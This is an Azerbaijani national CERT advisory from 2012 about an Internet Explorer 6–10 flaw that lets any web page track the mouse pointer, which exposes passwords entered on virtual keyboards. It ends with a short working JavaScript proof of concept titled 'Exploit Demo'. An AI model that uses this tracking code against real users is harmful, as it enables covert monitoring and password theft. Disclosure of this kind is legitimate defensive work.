XÜSUSİ DÖVLƏT MÜHAFİZƏ XİDMƏTİ
XÜSUSİ RABİTƏ VƏ İNFORMASİYA
TƏHLÜKƏSİZLİYİ DÖVLƏT AGENTLİYİ

KOMPÜTER İNSİDENTLƏRİNƏ QARŞI MÜBARİZƏ
MƏRKƏZİ

İnsident bildir

Xəbərlər > İnternet Explorerin istənilən səhifəsi siçan qurğusunun hərəkətinə nəzarət edə bilər.

13 Dek 2012

           

İnternet Explorer brauzerində təhlükəli baq (baq – jarqon olan bir termindir, adətən proqramda və sistemdə olan səhv mənasını bildirir) aşkar olunmuşdur. Hansı ki, istifadəçinin sistemində siçaçan qurğusunun hərəkətinə nəzarət etmək imkanı verir. Baq İnternet Explorerin 6-cı versiyasından başlayaraq 10-cu versiyasiyalarına kimi mövcuddur. Bu boşluqdan xakerlər istifadəçilərə məxsus parollar haqda informasiya ala bilərlər hansı ki virtual klaviaturadan daxil olunub. Virtual klaviatura təhlükəsizliyin yüksək olmasına görə istifadə edilir ki , keylogerlərdən informasiya gizlədilsin. Microsoft şirkəti özü bunun istifadəsini məsləhət görür. Belə ki, İnternet Explorer brauzeri bu qorunmanı tam təkzib edir, çünki hal hazırda İnternet Explorerdə virtual klaviaturadan istifadə təhlükəlidir nəinki adi klaviaturada. Microsoft Security Research Center-in təhlükəsizlik üzrə mütəxəsisləri bu boşluqdan xəbərdardırlar və yaxın vaxtlarda bu boşluğu aradan qaldırmaq niyyətində olmadıqlarını deyiblər.

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>Exploit Demo</title>
<script type="text/javascript">
window.attachEvent("onload", function() {
var detector = document.getElementById("detector");
detector.attachEvent("onmousemove", function (e) {
detector.innerHTML = e.screenX + ", " + e.screenY;
});
setInterval(function () {
detector.fireEvent("onmousemove");
}, 100);
});
</script>
</head>
<body>
<div id="detector"></div>
</body>
</html>